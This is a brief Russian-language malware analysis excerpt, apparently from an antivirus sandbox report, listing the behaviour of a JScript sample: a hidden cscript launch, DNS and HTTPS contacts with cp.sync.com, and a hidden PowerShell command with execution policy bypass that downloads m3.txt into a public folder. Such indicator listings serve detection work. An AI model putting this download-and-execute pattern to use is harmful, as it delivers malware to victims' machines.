Техническая информация
- https://cp.sync.com/mfs-60:7e82a548b8a45296567c507620fa9616=============================/u/m3.txt?cachekey=60:7e82a548b8a45296567c507620fa9616=============================&datakey=rib6uvsfzefxg... как c:\users\public\libraries\m3.txt
- 'cp.#ync.com':443
- 'cp.#ync.com':443
- DNS ASK cp.#ync.com
- '%WINDIR%\syswow64\cscript.exe' /e:jscript "<PATH_SAMPLE>.js"' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass (New-Object System.Net.WebClient).DownloadFile('https://cp.sync.com/mfs-60:7e82a548b8a45296567c507620fa9616=============================/u/m3.txt?cachekey=60:7e82a...' (со скрытым окном)
- '%WINDIR%\syswow64\cscript.exe' /e:jscript "<PATH_SAMPLE>.js"